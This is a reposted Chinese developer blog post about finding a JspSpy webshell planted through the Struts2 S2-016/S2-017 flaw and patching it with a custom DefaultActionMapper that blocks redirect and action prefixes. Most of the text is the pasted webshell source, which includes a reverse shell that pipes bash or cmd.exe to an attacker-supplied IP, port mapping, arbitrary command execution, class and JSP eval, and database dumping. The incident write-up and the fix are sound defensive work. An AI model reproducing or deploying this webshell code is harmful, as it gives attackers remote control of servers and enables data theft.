null ;Socket remoteSoc =
null ;DataInputStream remoteIn =
null ;DataOutputStream remoteOut =
null ;DataInputStream localIn =
null ;DataOutputStream localOut =
null ; try {soc =
server.accept();remoteSoc =
new Socket();remoteSoc.connect( new InetSocketAddress(remoteIP, Integer.parseInt(remotePort)));remoteIn =
new DataInputStream(remoteSoc.getInputStream());remoteOut =
new DataOutputStream(remoteSoc.getOutputStream());localIn =
new DataInputStream(soc.getInputStream());localOut =
new DataOutputStream(soc.getOutputStream());StreamConnector.readFromLocal(localIn,remoteOut);StreamConnector.readFromRemote(soc, remoteSoc,remoteIn, localOut);} catch (Exception ex) { break ;}}}}).start();JSession.setAttribute( "done", "Map Port Success!"
);JSession.setAttribute( "localIP"
, localIP);JSession.setAttribute( "localPort"
, localPort);JSession.setAttribute( "remoteIP"
, remoteIP);JSession.setAttribute( "remotePort"
, remotePort);JSession.setAttribute(SESSION_O, "vmp"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} // VBackConnect private static class VbcInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();Object ip = JSession.getAttribute("ip"
);Object port = JSession.getAttribute("port"
);Object program = JSession.getAttribute("program"
);Object done = JSession.getAttribute("done"
);JSession.removeAttribute( "ip"
);JSession.removeAttribute( "port"
);JSession.removeAttribute( "program"
);JSession.removeAttribute( "done"
); if (Util.isEmpty(ip))ip =
request.getRemoteAddr(); if (Util.isEmpty(port) || !
Util.isInteger(port.toString()))port = "1234"
; if (Util.isEmpty(program)) { if (ISLINUX)program = "/bin/bash"
; else program = "cmd.exe"
;} if (!
Util.isEmpty(done))Util.outMsg(out, done.toString());out.println( "
SHELL_NAME+ "\" method=\"post\">"+ " "+ " "+ " "+ " Back Connect >> "+ " "+ " "+ " " + " " + " " + "
"+ " "
);} catch (Exception e) { throw e;}}} private static class BackConnectInvoker
extends DefaultInvoker { public boolean doAfter() { return false ;} public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String ip = request.getParameter("ip"
);String port = request.getParameter("port"
);String program = request.getParameter("program"
); if (Util.isEmpty(ip) ||
Util.isEmpty(program) || !
Util.isInteger(port)) return ;Socket socket =
new Socket(ip, Integer.parseInt(port));Process process =
Runtime.getRuntime().exec(program);( new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();( new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start();( new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();JSession.setAttribute( "done", "Back Connect Success!"
);JSession.setAttribute( "ip"
, ip);JSession.setAttribute( "port"
, port);JSession.setAttribute( "program"
, program);JSession.setAttribute(SESSION_O, "vbc"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} private static class JspEnvInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
"+ " "+ " System Properties >> "+ " "+ " "+ " ");Properties pro = System.getProperties();Enumeration names = pro.propertyNames(); while (names.hasMoreElements()) {String name = (String) names.nextElement();out.println( "" + Util.htmlEncode(name) + " : "+ Util.htmlEncode(pro.getProperty(name)) + " ");}out.println( " System Environment >> "); /* Map envs = System.getenv();Set> entrySet = envs.entrySet();for (Map.Entry en:entrySet) {out.println(""+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+" ");} */ out.println( " " + " "+ "
"
);} catch (Exception e) { throw e;}}} private static class ReflectInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String c = request.getParameter("Class"
);Class cls =
null ; try { if (!
Util.isEmpty(c))cls =
Class.forName(c);} catch (ClassNotFoundException ex) {Util.outMsg(out, "
Class " + c + " Not Found ! "
);}out.println( "
SHELL_NAME+ "\" id='refForm' method=\"post\">"+ " "+ " "+ " "+ " Java Reflect >> "+ " " + " "+ " " + "
" + " "
); if (cls !=
null ) {StringBuffer sb =
new StringBuffer(); if (cls.getPackage() !=
null )sb.append( "package " +
cls.getPackage().getName() + ";\n"
);String n =
null ; if (cls.isInterface())n = ""
; // else if (cls.isEnum()) // n = "enum"; else n = "class"
;sb.append(Modifier.toString(cls.getModifiers()) + " " +
n + " " + cls.getName() + "\n"
); if (cls.getSuperclass() !=
null )sb.append( "\textends
cls.getSuperclass().getName()+ "';document.forms['refForm'].submit()\" style='color:red;'>"+ cls.getSuperclass().getName() + " \n"
); if (cls.getInterfaces() !=
null && cls.getInterfaces().length != 0
) {Class[] faces =
cls.getInterfaces();sb.append( "\t implements "
); for (
int i = 0; i < faces.length; i++
) {sb.append( "
faces[i].getName()+ "';document.forms['refForm'].submit()\" style='color:red'>"+ faces[i].getName() + " "
); if (i != faces.length - 1
) {sb.append( ","
);}}}sb.append( "{\n\t\n"
);sb.append( "\t//constructors..\n"
);Constructor[] cs =
cls.getConstructors(); for (
int i = 0; i < cs.length; i++
) {Constructor cc =
cs[i];sb.append( "\t" + cc + ";\n"
);}sb.append( "\n\t//fields\n"
);Field[] fs =
cls.getDeclaredFields(); for (
int i = 0; i < fs.length; i++
) {Field f =
fs[i];sb.append( "\t" + f.toString() + ";"
); if (Modifier.toString(f.getModifiers()).indexOf( "static") != -1
) {sb.append( "\t//value is : "
);f.setAccessible( true );Object obj = f.get(
null );sb.append( "
"); if (obj != null )sb.append(obj.toString()); else sb.append( "NULL");sb.append( " "
);}sb.append( "\n"
);}sb.append( "\n\t//methods\n"
);Method[] ms =
cls.getDeclaredMethods(); for (
int i = 0; i < ms.length; i++
) {Method m =
ms[i];sb.append( "\t" + m.toString() + ";\n"
);}sb.append( "}\n"
);String m = "
"+ Util.highLight(sb.toString()).replaceAll("\t", " ").replaceAll( "\n", " ") + " "
;Util.outMsg(out, m, "left"
);}} catch (Exception e) { throw e;}}} private static class TopInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
SHELL_NAME+ "\" method=\"post\" name=\"doForm\"> "+ "
"
); if (JSession.getAttribute(MSG) !=
null ) {Util.outMsg(out, JSession.getAttribute(MSG).toString());JSession.removeAttribute(MSG);} if (JSession.getAttribute(ENTER_MSG) !=
null ) {String outEntry = request.getParameter("outentry"
); if (Util.isEmpty(outEntry) || !outEntry.equals("true"
))Util.outMsg(out, JSession.getAttribute(ENTER_MSG).toString());}} catch (Exception e) { throw e;}}} private static class VOnLineShellInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);out.println( "
"
);} catch (Exception e) { throw e;}}} private static class OnLineInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String type = request.getParameter("type"
); if (Util.isEmpty(type)) return ; if (type.toLowerCase().equals("start"
)) {String exe = request.getParameter("exe"
); if (Util.isEmpty(exe)) return ;Process pro =
Runtime.getRuntime().exec(exe);ByteArrayOutputStream outs =
new ByteArrayOutputStream();response.setContentLength( 100000000
);response.setContentType( "text/html;charset="+ System.getProperty("file.encoding"
));OnLineProcess olp =
new OnLineProcess(pro);JSession.setAttribute(SHELL_ONLINE, olp); new OnLineConnector(
new ByteArrayInputStream(outs.toByteArray()), pro.getOutputStream(), "exeOclientR"
, olp).start(); new OnLineConnector(pro.getInputStream(), response.getOutputStream(), "exeRclientO"
, olp).start(); new OnLineConnector(pro.getErrorStream(), response.getOutputStream(), "exeRclientO"
, olp).start();Thread.sleep( 1000 * 60 * 60 * 24
);} else if (type.equals("ecmd"
)) {Object o =
JSession.getAttribute(SHELL_ONLINE);String cmd = request.getParameter("cmd"
); if (Util.isEmpty(cmd)) return ; if (o ==
null ) return ;OnLineProcess olp =
(OnLineProcess) o;olp.setCmd(cmd);} else {Object o =
JSession.getAttribute(SHELL_ONLINE); if (o ==
null ) return ;OnLineProcess olp =
(OnLineProcess) o;olp.stop();}} catch (Exception e) { throw e;}}} private static class EnterInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {PrintWriter out =
response.getWriter();String type = request.getParameter("type"
); if (!
Util.isEmpty(type)) {JSession.removeAttribute(ENTER);JSession.removeAttribute(ENTER_MSG);JSession.removeAttribute(ENTER_CURRENT_DIR);JSession.setAttribute(MSG, "Exit File Success ! "
);} else {String f = request.getParameter("filepath"
); if (Util.isEmpty(f)) return ;JSession.setAttribute(ENTER, f);JSession.setAttribute(ENTER_MSG, "You Are In File
\""+ f + "\" Now !
Exit "
);}response.sendRedirect(SHELL_NAME);}} private static class VExport2FileInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {PrintWriter out =
response.getWriter();String type = request.getParameter("type"
);String sql = request.getParameter("sql"
);String table = request.getParameter("table"
); if (Util.isEmpty(sql) &&
Util.isEmpty(table)) {JSession.setAttribute(SESSION_O, "vConn"
);response.sendRedirect(SHELL_NAME); return ;}out.println( "
"+ "" + " "
);}} private static class ExportInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {String type = request.getParameter("type"
);String filepath = request.getParameter("filepath"
);String encode = request.getParameter("encode"
);String sql =
null ;DBOperator dbo =
null ;dbo =
(DBOperator) JSession.getAttribute(DBO); if (Util.isEmpty(type)) { // table export String tb = request.getParameter("table"
); if (Util.isEmpty(tb)) return ;String s =
dbo.getConn().getMetaData().getIdentifierQuoteString();sql = "select * from " + s + tb +
s;} else if (type.equals("queryexp"
)) { // query export sql = request.getParameter("sql"
); if (Util.isEmpty(sql)) {JSession.setAttribute(SESSION_O, "vConn"
);response.sendRedirect(SHELL_NAME); return ;}}Object o =
dbo.execute(sql);ByteArrayOutputStream bout =
new ByteArrayOutputStream(); byte [] rowSep = "\r\n"
.getBytes(); if (o
instanceof ResultSet) {ResultSet rs =
(ResultSet) o;ResultSetMetaData meta =
rs.getMetaData(); int count =
meta.getColumnCount(); for (
int i = 1; i <= count; i++
) {String colName = meta.getColumnName(i) + "\t"
; byte [] b =
null ; if (Util.isEmpty(encode))b =
colName.getBytes(); else b =
colName.getBytes(encode);bout.write(b, 0
, b.length);}bout.write(rowSep, 0
, rowSep.length); while (rs.next()) { for (
int i = 1; i <= count; i++
) {String v =
null ; try {v =
rs.getString(i);} catch (SQLException ex) {v = "<
>";}v += "\t"; byte [] b = null ; if (Util.isEmpty(encode))b = v.getBytes(); else b = v.getBytes(encode);bout.write(b, 0, b.length);}bout.write(rowSep, 0, rowSep.length);}rs.close();ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray());BufferedOutputStream output = null ; if (!Util.isEmpty(filepath)) { // export2file output = new BufferedOutputStream(new FileOutputStream( new File(filepath)));} else { // download. response.setHeader("Content-Disposition", "attachment;filename=DataExport.txt");output = new BufferedOutputStream(response.getOutputStream());} byte [] data = new byte [1024]; int len = input.read(data); while (len != -1) {output.write(data, 0, len);len = input.read(data);}bout.close();input.close();output.close(); if (!Util.isEmpty(filepath)) {JSession.setAttribute(MSG, "Export To File Success !");response.sendRedirect(SHELL_NAME);}}}} private static class EvalInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {String type = request.getParameter("type");PrintWriter out = response.getWriter();Object msg = JSession.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);JSession.removeAttribute(MSG);} if (Util.isEmpty(type)) {out.println( "");} else if (type.equals("jsp")) {String jspc = request.getParameter("jspc"); if (Util.isEmpty(jspc)) return ;File f = new File(SHELL_DIR, "evaltmpninty.jsp");BufferedWriter writer = new BufferedWriter( new OutputStreamWriter(new FileOutputStream(f), "utf-8"));writer.write(jspc, 0, jspc.length());writer.flush();writer.close();out.println( " ");f.delete();}}} private static class EvalUploadInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {ByteArrayOutputStream stream = new ByteArrayOutputStream();UploadBean upload = new UploadBean();upload.setTargetOutput(stream);upload.parseRequest(request); if 
(stream.toByteArray().length == 2) {JSession.setAttribute(MSG, "Please Upload Your Class File ! ");((Invoker) ins.get( "ev")).invoke(request, response, JSession); return ;}SpyClassLoader loader = new SpyClassLoader(); try {Class c = loader.defineClass(null , stream.toByteArray());c.newInstance();} catch (Exception e) {}stream.close();JSession.setAttribute(MSG, "Eval Java Class Done ! ");((Invoker) ins.get( "ev")).invoke(request, response, JSession);}} private static class VOtherInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out = response.getWriter();Object msg = JSession.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);JSession.removeAttribute(MSG);}out.println( ""+ " "+ " Session Manager>> "+ " "+ " "+ " " + "
");} catch (Exception e) { throw e;}}} // Session Manager private static class SmInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String type = request.getParameter("type");PrintWriter out = response.getWriter(); if (type.equals("update")) {String name = request.getParameter("name");String value = request.getParameter("value");JSession.setAttribute(name, value);JSession.setAttribute(MSG, "Update/Add Attribute Success !");} else if (type.equals("delete")) {String name = request.getParameter("name");JSession.removeAttribute(name);JSession.setAttribute(MSG, "Remove Attribute Success !");}((Invoker) ins.get( "vother")).invoke(request, response,JSession);} catch (Exception e) { throw e;}}} static {ins.put( "script", new ScriptInvoker());ins.put( "before", new BeforeInvoker());ins.put( "after", new AfterInvoker());ins.put( "deleteBatch", new DeleteBatchInvoker());ins.put( "clipboard", new ClipBoardInvoker());ins.put( "vPortScan", new VPortScanInvoker());ins.put( "portScan", new PortScanInvoker());ins.put( "vConn", new VConnInvoker());ins.put( "dbc", new DbcInvoker());ins.put( "executesql", new ExecuteSQLInvoker());ins.put( "vLogin", new VLoginInvoker());ins.put( "login", new LoginInvoker());ins.put( "filelist", new FileListInvoker());ins.put( "logout", new LogoutInvoker());ins.put( "upload", new UploadInvoker());ins.put( "copy", new CopyInvoker());ins.put( "bottom", new BottomInvoker());ins.put( "vCreateFile", new VCreateFileInvoker());ins.put( "vEdit", new VEditInvoker());ins.put( "createFile", new CreateFileInvoker());ins.put( "vEditProperty", new VEditPropertyInvoker());ins.put( "editProperty", new EditPropertyInvoker());ins.put( "vs", new VsInvoker());ins.put( "shell", new ShellInvoker());ins.put( "down", new DownInvoker());ins.put( "vd", new VdInvoker());ins.put( "downRemote", new DownRemoteInvoker());ins.put( "index", new IndexInvoker());ins.put( "mkdir", new 
MkDirInvoker());ins.put( "move", new MoveInvoker());ins.put( "removedir", new RemoveDirInvoker());ins.put( "packBatch", new PackBatchInvoker());ins.put( "pack", new PackInvoker());ins.put( "unpack", new UnPackInvoker());ins.put( "vmp", new VmpInvoker());ins.put( "vbc", new VbcInvoker());ins.put( "backConnect", new BackConnectInvoker());ins.put( "jspEnv", new JspEnvInvoker());ins.put( "smp", new SmpInvoker());ins.put( "mapPort", new MapPortInvoker());ins.put( "top", new TopInvoker());ins.put( "vso", new VOnLineShellInvoker());ins.put( "online", new OnLineInvoker());ins.put( "enter", new EnterInvoker());ins.put( "export", new ExportInvoker());ins.put( "ev", new EvalInvoker());ins.put( "eu", new EvalUploadInvoker());ins.put( "vother", new VOtherInvoker());ins.put( "sm", new SmInvoker());ins.put( "vExport", new VExport2FileInvoker());ins.put( "vPack", new VPackConfigInvoker());ins.put( "reflect", new ReflectInvoker());ins.put( "portBack", new PortBackInvoker());} %>
<%try {String o = request.getParameter("o"); if (Util.isEmpty(o)) { if (session.getAttribute(SESSION_O) == null )o = "index"; else {o = session.getAttribute(SESSION_O).toString();session.removeAttribute(SESSION_O);}}Object obj = ins.get(o); if (obj == null ) {response.sendRedirect(SHELL_NAME);} else {Invoker in = (Invoker) obj; if (in.doBefore()) {String path = request.getParameter("folder"); if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null )session.setAttribute(CURRENT_DIR, path);((Invoker) ins.get( "before")).invoke(request, response,session);((Invoker) ins.get( "script")).invoke(request, response,session);((Invoker) ins.get( "top")).invoke(request, response,session);}in.invoke(request, response, session); if (!in.doAfter()) { return ;} else {((Invoker) ins.get( "bottom")).invoke(request, response,session);((Invoker) ins.get( "after")).invoke(request, response,session);}}} catch (Exception e) {Object msg = session.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);session.removeAttribute(MSG);} if (e.toString().indexOf("ClassCastException") != -1) {Util.outMsg(out, MODIFIED_ERROR + BACK_HREF);}ByteArrayOutputStream bout = new ByteArrayOutputStream();e.printStackTrace( new PrintStream(bout));session.setAttribute(CURRENT_DIR, SHELL_DIR);Util.outMsg(out, Util.htmlEncode( new String(bout.toByteArray())).replaceAll( "\n", " "), "left");bout.close();out.flush();((Invoker) ins.get( "bottom")).invoke(request, response, session);((Invoker) ins.get( "after")).invoke(request, response, session);}
%> 搜索了下关键字 JspSpy,发现可以利用 Struts2 的 S2-016/S2-017 漏洞把文件上传到服务器。
找了2个利用漏洞的软件进行测试,经过简单的几步操作就把文件上传到了我们的平台目录下,这...么...简单。以前听说过Struts2的漏洞,后来又把.jquery.jsp放上去登录了下,里面有文件操作、数据库操作。看完后,我马上删除了,心里真是谢谢这位上传文件的‘仁兄’,没对我们数据库动手。脑海跑过一万只草泥马。
修复
经总结有3种常用方案。
1、通过修改struts2源码修复
2、升级struts2(容易遇到兼容性问题)
3、重写struts2 DefaultActionMapper的handleSpecialParameters方法,增加action、redirect、redirectAction等参数的过滤。此方法可修补漏洞。
我先选了【2、升级struts2】,可怜我替换了半天的jar包。最后终于编译通过了,运行没问题,晚上10点开始更新代码(为什么10点更新,因为这个时候用户较少)。- -!听说有热部署,不知道能不能解决我们这种原始的更新部署存在的一些问题,有时间了再学习学习,继续正题。代码更新好,运行测试软件,还是有016 017漏洞(说明换上的版本很可能仍不包含针对该漏洞的修复)。
时间已经10点多了,问题还是要解决的,想想我用软件测试漏洞上传webshell的过程如此so easy,不行必须要解决掉。不能留后患。
发现了第三种解决方法
操作步骤: 1 新建com/website/struts2/MyDefaultActionMapper.java,代码如下:
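package com.website.struts2;

import java.util.HashSet;
import java.util.Map;
import java.util.Set;

import javax.servlet.http.HttpServletRequest;

import org.apache.struts2.dispatcher.mapper.ActionMapping;
import org.apache.struts2.dispatcher.mapper.DefaultActionMapper;
import org.apache.struts2.dispatcher.mapper.ParameterAction;

/**
 * Action mapper that refuses to process a request's "special" (prefixed) parameters when any
 * parameter name contains {@code redirect:}, {@code redirectAction:} or {@code action:}.
 *
 * <p>These prefixes are the path abused by the Struts2 016/017 issues the post describes;
 * skipping the whole special-parameter pass for such a request means the prefix never reaches
 * {@link ParameterAction#execute}. This is a mitigation layered on top of the framework:
 * upgrading Struts2 to a release that contains the upstream fix remains the durable remedy, and
 * the mapper only takes effect once it is registered in {@code struts.xml}.
 */
public class MyDefaultActionMapper extends DefaultActionMapper {

    /** Parameter-name fragments that cause the whole special-parameter pass to be skipped. */
    private static final String[] BLOCKED_PREFIXES = {"redirect:", "redirectAction:", "action:"};

    /**
     * Applies at most one recognised prefix parameter to {@code mapping}, or none at all when a
     * blocked fragment is present in any parameter name of the request.
     *
     * <p>Names are inspected in the order the container's parameter map yields them; the first
     * name that resolves through {@code prefixTrie} is executed and the loop stops, mirroring the
     * superclass. A blocked name aborts the pass immediately, so even otherwise legitimate
     * prefixes (for example {@code method:}) are ignored for that request.
     *
     * @param request the current request; only parameter names are read, never values
     * @param mapping the mapping that a matching {@link ParameterAction} may modify
     */
    @Override
    public void handleSpecialParameters(HttpServletRequest request, ActionMapping mapping) {
        Set<String> uniqueParameters = new HashSet<String>();
        // Older servlet APIs return a raw Map; keys are cast exactly as the superclass does.
        Map<?, ?> parameterMap = request.getParameterMap();
        for (Object rawKey : parameterMap.keySet()) {
            String key = (String) rawKey;
            // Image-input submissions append ".x"/".y" to the control name; strip them so the
            // prefix lookup sees the bare name.
            if (key.endsWith(".x") || key.endsWith(".y")) {
                key = key.substring(0, key.length() - 2);
            }
            // -- jason.zhou 20130708: bail out on any blocked prefix -- //
            if (containsBlockedPrefix(key)) {
                return;
            }
            if (!uniqueParameters.contains(key)) {
                ParameterAction parameterAction = (ParameterAction) this.prefixTrie.get(key);
                if (parameterAction != null) {
                    parameterAction.execute(key, mapping);
                    uniqueParameters.add(key);
                    break;
                }
            }
        }
    }

    /**
     * Returns {@code true} when {@code key} contains any entry of {@link #BLOCKED_PREFIXES}.
     * {@code contains} rather than {@code startsWith} is deliberate: it is the stricter test and
     * also matches names where the fragment appears after other text.
     */
    private static boolean containsBlockedPrefix(String key) {
        for (String prefix : BLOCKED_PREFIXES) {
            if (key.contains(prefix)) {
                return true;
            }
        }
        return false;
    }
}
2 用struts.xml添加如下代码: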
上传再测试,ok。
想到这个问题的严重性,决定记录下来。好了不多说了已经0点了。收拾收拾回家。
转载于:https://www.cnblogs.com/july4/p/5327457.html